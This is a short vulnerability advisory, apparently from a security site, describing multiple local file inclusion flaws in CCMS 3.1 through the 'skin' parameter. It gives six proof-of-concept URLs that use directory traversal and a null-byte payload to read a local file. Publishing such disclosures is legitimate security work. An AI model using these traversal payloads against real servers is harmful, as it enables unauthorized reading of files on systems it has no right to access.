CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities

2008-10-10 / 2008-10-11
Credit: SirGod
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


Ogólna skala CVSS: 10/10
Znaczenie: 10/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

############################################################################################ [+] CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities [+] Discovered By SirGod [+] wWw.MorTal-TeaM.OrG [+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke ############################################################################################ [+] Download Script : http://rapidshare.com/files/94804716/CCMS_v3.1_by_Mikel_Dean.rar [+] Local File Inclusion -------------------------------------------------------------------------------------------- PoC 1 : http://[target]/[path]/index.php?skin=[Local File]%00 Example 1 : http://127.0.0.1/path/index.php?skin=../../../../autoexec.bat%00 -------------------------------------------------------------------------------------------- PoC 2 : http://[target]/[path]/forums.php?skin=[Local File]%00 Example 2 : http://127.0.0.1/path/forums.php?skin=../../../../autoexec.bat%00 -------------------------------------------------------------------------------------------- PoC 3 : http://[target]/[path]/admin.php?skin=[Local File]%00 Example 3 : http://127.0.0.1/path/admin.php?skin=../../../../autoexec.bat%00 -------------------------------------------------------------------------------------------- PoC 4 : http://[target]/[path]/header.php?skin=[Local File]%00 Example 4 : http://127.0.0.1/path/header.php?skin=../../../../autoexec.bat%00 -------------------------------------------------------------------------------------------- PoC 5 : http://[target]/[path]/pages/story.php?skin=[Local File]%00 Example 5 : http://127.0.0.1/path/pages/story.php?skin=../../../../../autoexec.bat%00 -------------------------------------------------------------------------------------------- PoC 6 : http://[target]/[path]/pages/poll.php?skin=[Local File]%00 Example 6 : http://127.0.0.1/path/pages/poll.php?skin=../../../../../autoexec.bat%00 -------------------------------------------------------------------------------------------- ############################################################################################

Referencje:

http://www.securityfocus.com/bid/31566
http://www.milw0rm.com/exploits/6663


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top